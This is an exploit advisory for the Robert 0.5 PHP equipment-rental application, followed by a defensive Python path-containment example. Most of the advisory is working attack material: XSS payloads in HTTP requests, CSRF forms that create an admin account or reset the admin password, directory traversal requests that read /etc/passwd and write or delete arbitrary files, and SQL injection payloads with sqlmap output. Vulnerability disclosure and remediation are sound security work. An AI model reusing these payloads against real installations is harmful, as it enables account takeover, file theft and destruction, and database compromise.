# Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory traversal & SQLi
# Date: 07/06/2017
# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
# Vendor website : http://robert.polosson.com/
# Download link : https://github.com/RobertManager/robert/archive/master.zip
# Live demo : http://robertdemo.polosson.com/
# Version: 0.5
# Tested on: Windows 7 x64 SP1 / Kali Linux

Robert is an open-source web application for managing a park of equipment for rental or loan. It is written in HTML, PHP, MySQL, CSS and Javascript.

Description :

Multiple security issues have been found : XSS, CSRF, Directory Traversal, SQLi.

1- XSS reflected

http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E

param vuln : go
script vuln : index.php

2- XSS reflected

POST /robert/modals/personnel_list_techniciens.php
data : searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom

param vuln : searchingfor
script vuln : personnel_list_techniciens.php

3- XSS Stored

POST /robert/fct/matos_actions.php
data : action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E

param vuln : label, ref and remarque
script vuln : matos_actions.php

4- XSS Stored

POST /robert/fct/packs_actions.php
data : action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1}

param vuln : label, ref and remarque
script vuln : packs_actions.php

5- XSS stored

POST /robert/fct/beneficiaires_actions.php
data : action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic=

param vuln : surnom, prenom, nom
script vuln : beneficiaires_actions.php

6- XSS stored

POST /robert/fct/tekos_actions.php
data : action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E

param vuln : label, type, adresse, ville, email, SIRET and remarque
script vuln : beneficiaires_actions.php

7- CSRF Create new admin

<form action="http://192.168.3.215/robert/fct/user_actions.php" method="POST">
  <input type="hidden" name="action" value="create"/>
  <input type="hidden" name="cMail" value="hacked@hacked.com"/>
  <input type="hidden" name="cName" value="hacked"/>
  <input type="hidden" name="cPren" value="hacked"/>
  <input type="hidden" name="cPass" value="hacked"/>
  <input type="hidden" name="cLevel" value="7"/>
  <input type="hidden" name="cTekos" value="0"/>
  <input type="submit" value="CSRFED This Shit"/>
</form>

8- CSRF Change admin password and infos

<form action="http://192.168.3.215/robert/fct/user_actions.php" method="POST">
  <input type="hidden" name="action" value="modifOwnUser"/>
  <input type="hidden" name="id" value="1"/>
  <input type="hidden" name="email" value="hacked"/>
  <input type="hidden" name="nom" value="hacked"/>
  <input type="hidden" name="prenom" value="hacked"/>
  <input type="hidden" name="password" value="hacked"/>
  <input type="submit" value="CSRFED This Shit"/>
</form>

9- Directory traversal on Download function (Read Arbitrary File)

http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd

param vuln : file
script vuln : downloader.php

10- Directory traversal on Upload function (Upload file in root path)

POST /robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
X-File-Name: filename.jpg
Content-Type: application/octet-stream
Referer: http://192.168.3.215/robert/index.php?go=gens
Content-Length: 99550
Cookie: YOURCOOKIE
Connection: close

...snip... file data ...snip...

param vuln : folder
script vuln : uploader.php

11- Directory traversal on Delete function (Delete Arbitrary File)

POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 42
Cookie: YOURCOOKIE
Connection: close

action=supprFichier&idPlan=4&file=../../../../tested.txt

param vuln : file
script vuln : plans_actions.php

12- SQL Injection

POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 20
Cookie: YOURCOOKIE
Connection: close

action=loadPlan&ID=2'

sqlmap output :

POST parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 397 HTTP(s) requests:
---
Parameter: ID (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: action=loadPlan&ID=2' OR NOT 8111=8111#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: action=loadPlan&ID=2';SELECT SLEEP(5)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN
---

param vuln : ID
script vuln : plans_actions.php

------------------------------------------------------------------------------------------------------------------------------
#### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit SecTeam ####
------------------------------------------------------------------------------------------------------------------------------
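An added example, not part of the advisory or of the Robert project: the containment check a download, upload or delete handler needs so that the dir/folder and file values from items 9, 10 and 11 above are refused rather than joined into a path. UPLOAD_ROOT, ALLOWED_DIRS and resolve_download_path are names assumed for this example; the fix for the real PHP handlers would follow the same logic with realpath().

```python
"""Safe resolution of a (sub-directory, file name) pair taken from a request.

Assumed layout for this example: every downloadable or deletable file lives
below UPLOAD_ROOT in one of a fixed set of sub-directories.
"""
from pathlib import Path
from typing import Optional

# Assumed upload root; the real application would use its configured path.
UPLOAD_ROOT = Path("/srv/robert/uploads")

# Constructed allow-list of sub-directories a request may name.
ALLOWED_DIRS = {"sql", "plans", "tekos"}


def resolve_download_path(dir_param: str, file_param: str,
                          root: Path = UPLOAD_ROOT) -> Optional[Path]:
    """Return the absolute path for root/dir_param/file_param, or None.

    None is returned when dir_param is not an allowed sub-directory, when
    file_param is not a single path component (contains a separator, a NUL,
    or is "", "." or ".."), or when the resolved path escapes the directory.
    """
    if dir_param not in ALLOWED_DIRS:
        return None
    if file_param in ("", ".", "..") or any(c in file_param for c in "/\\\x00"):
        return None
    base = (root / dir_param).resolve()
    candidate = (base / file_param).resolve()
    # Containment check after symlink/'..' resolution: the candidate must be
    # the base directory itself or something below it.
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request values, the first two taken from items 9 and 10.
    for d, f in [("sql", "../../../../../../etc/passwd"),
                 ("../../config", "filename.jpg"),
                 ("sql", "dump.sql")]:
        print(f"dir={d!r} file={f!r} -> {resolve_download_path(d, f)}")
```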